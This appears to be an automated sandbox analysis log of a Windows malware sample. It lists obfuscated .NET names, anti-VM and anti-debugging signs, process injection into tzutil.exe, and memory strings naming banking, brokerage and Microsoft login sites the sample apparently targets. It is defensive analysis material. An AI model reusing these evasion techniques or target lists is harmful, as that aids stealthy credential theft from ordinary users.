Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, hE4xOOx5KKlkXkTuo1.cs	High entropy of concatenated method names: 'KmDlZCidRX', 'IP7lHThpKW', 'KuylY9OjgM', 'WrZlu26jCS', 'SDJl5TilML', 'kxqlr4TTMC', 'pLhlofJdYb', 'XanlMvv9qA', 'IGilFWvjLR', 'n4plapsuH6'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, a8rXRVlElGWB7m5At4g.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'egxcUXAiSc', 'NYicWYAcyb', 'ypjcjoK0px', 'Kp3cAIQMoS', 'rSIcmjAbf2', 'tmtceRHesB', 'vu7cbGWAXN'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, PgUPrmN9OkyZYhsH6m.cs	High entropy of concatenated method names: 'XQBl2pDqHJ', 'lHil9jWEVH', 'tFMlSBZSCQ', 'CrjlDsFHii', 'e1glUKSZaf', 'scVl8uLaHA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, m4Z8RgA3BJcvYCtk6u.cs	High entropy of concatenated method names: 'ToString', 'JG0KR7GulM', 'gLhK9N3MoE', 'r1SKS8gur0', 'AOrKD6954x', 'XsBK8DkIuS', 'sUeK48k1RS', 'OEnKkqMKnj', 'LGmK77vXsA', 'iw7KfOsadq'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, hfC9VHFwouJs1J8uLf.cs	High entropy of concatenated method names: 'JNhC1KpU45', 'DxNCQ7ZNcx', 'SiLC2LJXh0', 'k8MC9990AQ', 'V08CDWdqE4', 'Q6HC8XJayu', 'LbeCklGrwm', 'VfMC7fdyR8', 'JyuCLtaYUi', 'kMsCRNLjqP'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, bUuFVTVCE7ddmiZVNH.cs	High entropy of concatenated method names: 'PmSrZOJ8JK', 'cblrYVSWxg', 'Sqsr50QRW2', 'JkH5NRFFuF', 'yge5z26Ydk', 'NY0rGRwxrb', 'aONrBE1qkM', 'EQArVQkQx4', 'bnxrqwsKLs', 'fXRrscKVQS'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, XsbEF1CyVZU6qSkjqs.cs	High entropy of concatenated method names: 'TA9EF3Pu8i', 'e3QEaij1kE', 'ToString', 'T2YEZSoh9D', 'hDWEHyDmCp', 'DF2EYsRnOp', 'AoGEuPaJQB', 'ID7E5gcJZ3', 'AQuErXxOtq', 'xqBEobfGtn'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, MysLsmpWAbRFA4GZva.cs	High entropy of concatenated method names: 'Dispose', 'KqABJb1NnC', 'qV6V95i1Ya', 'vtOxx2imxd', 'E9dBN3aPRM', 'gPVBzFMWen', 'ProcessDialogKey', 'dk9VGhAEQW', 'sPZVBtJOjw', 'OM2VVyu92x'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, C8gfGJ2tSRIJmw7fXi.cs	High entropy of concatenated method names: 'w8ndL97vCq', 'bNCdOGNt9B', 'F7BdUtEqMr', 'OWfdWvZbTM', 'IX8d9kAJqQ', 'lqtdSHwuhP', 'CQPdDi0q5h', 'iEcd85X4Cx', 'y0wd4dJGdM', 'EK7dkybwIq'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, yaC5dx9LwQox17wUZp.cs	High entropy of concatenated method names: 'aORHUEMQnv', 'H7wHWMrad9', 'nh9HjhVdvL', 'Hb8HAHrJSA', 'CnDHmqObwN', 'D1HHe72Z3L', 'rGJHbwMRjt', 'T9cHpoa6Db', 'hZpHJUMJSH', 'fX9HNZVPBU'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, BHvYSWLZdTOvp6RQxf.cs	High entropy of concatenated method names: 'eneBrTTBWB', 'bg0BoXJ5wa', 'ARJBFV6YNv', 'XRWBahRlNg', 'V9FBdIFbEW', 'OZXBKVQxUc', 'Gp0We53YHNbgB90PVj', 'BgbwLJkbO4f5Jmfeod', 'bKJBBhwmeI', 'TtCBqWmuBX'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, Qfrm0GaQm1L7jwfQEy.cs	High entropy of concatenated method names: 'GtNIKtXZh', 'trWwy1Nnh', 'zrOh99GIh', 'Hodg3Ssm0', 'agHQXciiS', 'InVnO4N30', 'wb6mjIgvBp50OPwiXW', 'DmKMCUGSXbTgh2Wdn9', 'pXqlUkqRS', 'Fguc9MxdL'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, pCu2SgwR82MTin2i3r.cs	High entropy of concatenated method names: 'mVVEp3xtay', 'iJfENMhs9B', 'scmlGaGbS0', 'VD0lBwIUNm', 'QLhER2EiWw', 'eCwEOZJovk', 'E1KE0RWqGj', 'SHuEUeI5WU', 'j2vEWn7W33', 'AshEjLctdb'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, R1Ca9Rlo0vFWlFHxnyg.cs	High entropy of concatenated method names: 'GCW36mN8yR', 'L6c3tqm669', 'VCn3IXxgVB', 'ld43w7WTQp', 'zou3vxPH68', 'DQK3hOf7HQ', 'inr3gQ500p', 'AcW31ScUKo', 'r6c3QBcEiT', 'cbV3nIqEht'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, Hl1BRtYQMlWmxYZHgZ.cs	High entropy of concatenated method names: 'XIvYwPvhl7', 'MPeYhhXEg7', 'jAPY1SAmDv', 'c5wYQBBF4D', 'EitYdVlLJU', 'wPpYKVd8FJ', 'BShYESWjyx', 'c5MYlxul5J', 'XV8Y357EtF', 'M5nYcS9NtQ'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, lFeBdVzAcr4lSCpxo5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KeS3CX1v5o', 'vAB3dPypqJ', 'wNr3KmncAM', 'UEB3ESb14v', 'WlG3lp1I01', 'wDo336RolW', 'P863cqPI0l'
Source: 0.2.3qsTcL9MOT.exe.7940000.5.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.3qsTcL9MOT.exe.7940000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 3qsTcL9MOT.exe PID: 1868, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: 1470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: 3380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: 83F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: 93F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: 95B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Memory allocated: A5B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Code function: 3_2_0041ECED rdtsc

3_2_0041ECED

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe

Window / User API: threadDelayed 9790

Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\tzutil.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe TID: 2220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 5064	Thread sleep count: 183 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 5064	Thread sleep time: -366000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 5064	Thread sleep count: 9790 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 5064	Thread sleep time: -19580000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe TID: 1276	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe TID: 1276	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe TID: 1276	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\tzutil.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\tzutil.exe

Code function: 6_2_032DC6B0 FindFirstFileW,FindNextFileW,FindClose,

6_2_032DC6B0

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: q3a81SS.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: q3a81SS.6.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: q3a81SS.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: GxqFOvQfqyr.exe, 00000007.00000002.4510240085.0000000000A19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: q3a81SS.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: q3a81SS.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: q3a81SS.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: q3a81SS.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: q3a81SS.6.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: q3a81SS.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tzutil.exe, 00000006.00000002.4509911861.00000000033CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: q3a81SS.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: q3a81SS.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: q3a81SS.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: q3a81SS.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: q3a81SS.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: q3a81SS.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: q3a81SS.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: q3a81SS.6.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: q3a81SS.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: q3a81SS.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: firefox.exe, 00000009.00000002.2589042599.000001ED1375D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllff

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Code function: 3_2_0041ECED rdtsc

3_2_0041ECED

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Code function: 3_2_004176A3 LdrLoadDll,

3_2_004176A3

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov eax, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov ecx, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov eax, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov eax, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov ecx, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov eax, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov eax, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov ecx, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov eax, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE10E mov ecx, dword ptr fs:[00000030h]	3_2_010BE10E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BA118 mov ecx, dword ptr fs:[00000030h]	3_2_010BA118
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BA118 mov eax, dword ptr fs:[00000030h]	3_2_010BA118
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BA118 mov eax, dword ptr fs:[00000030h]	3_2_010BA118
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BA118 mov eax, dword ptr fs:[00000030h]	3_2_010BA118
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D0115 mov eax, dword ptr fs:[00000030h]	3_2_010D0115
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01040124 mov eax, dword ptr fs:[00000030h]	3_2_01040124
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A4144 mov eax, dword ptr fs:[00000030h]	3_2_010A4144
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A4144 mov eax, dword ptr fs:[00000030h]	3_2_010A4144
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A4144 mov ecx, dword ptr fs:[00000030h]	3_2_010A4144
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A4144 mov eax, dword ptr fs:[00000030h]	3_2_010A4144
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A4144 mov eax, dword ptr fs:[00000030h]	3_2_010A4144
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A8158 mov eax, dword ptr fs:[00000030h]	3_2_010A8158
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016154 mov eax, dword ptr fs:[00000030h]	3_2_01016154
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016154 mov eax, dword ptr fs:[00000030h]	3_2_01016154
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100C156 mov eax, dword ptr fs:[00000030h]	3_2_0100C156
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4164 mov eax, dword ptr fs:[00000030h]	3_2_010E4164
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4164 mov eax, dword ptr fs:[00000030h]	3_2_010E4164
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01050185 mov eax, dword ptr fs:[00000030h]	3_2_01050185
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CC188 mov eax, dword ptr fs:[00000030h]	3_2_010CC188
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CC188 mov eax, dword ptr fs:[00000030h]	3_2_010CC188
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B4180 mov eax, dword ptr fs:[00000030h]	3_2_010B4180
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B4180 mov eax, dword ptr fs:[00000030h]	3_2_010B4180
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109019F mov eax, dword ptr fs:[00000030h]	3_2_0109019F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109019F mov eax, dword ptr fs:[00000030h]	3_2_0109019F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109019F mov eax, dword ptr fs:[00000030h]	3_2_0109019F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109019F mov eax, dword ptr fs:[00000030h]	3_2_0109019F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100A197 mov eax, dword ptr fs:[00000030h]	3_2_0100A197
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100A197 mov eax, dword ptr fs:[00000030h]	3_2_0100A197
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100A197 mov eax, dword ptr fs:[00000030h]	3_2_0100A197
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D61C3 mov eax, dword ptr fs:[00000030h]	3_2_010D61C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D61C3 mov eax, dword ptr fs:[00000030h]	3_2_010D61C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E1D0 mov eax, dword ptr fs:[00000030h]	3_2_0108E1D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E1D0 mov eax, dword ptr fs:[00000030h]	3_2_0108E1D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E1D0 mov ecx, dword ptr fs:[00000030h]	3_2_0108E1D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E1D0 mov eax, dword ptr fs:[00000030h]	3_2_0108E1D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E1D0 mov eax, dword ptr fs:[00000030h]	3_2_0108E1D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E61E5 mov eax, dword ptr fs:[00000030h]	3_2_010E61E5
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010401F8 mov eax, dword ptr fs:[00000030h]	3_2_010401F8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01094000 mov ecx, dword ptr fs:[00000030h]	3_2_01094000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000 mov eax, dword ptr fs:[00000030h]	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E016 mov eax, dword ptr fs:[00000030h]	3_2_0102E016
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E016 mov eax, dword ptr fs:[00000030h]	3_2_0102E016
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E016 mov eax, dword ptr fs:[00000030h]	3_2_0102E016
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E016 mov eax, dword ptr fs:[00000030h]	3_2_0102E016
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100A020 mov eax, dword ptr fs:[00000030h]	3_2_0100A020
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100C020 mov eax, dword ptr fs:[00000030h]	3_2_0100C020
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A6030 mov eax, dword ptr fs:[00000030h]	3_2_010A6030
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01012050 mov eax, dword ptr fs:[00000030h]	3_2_01012050
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096050 mov eax, dword ptr fs:[00000030h]	3_2_01096050
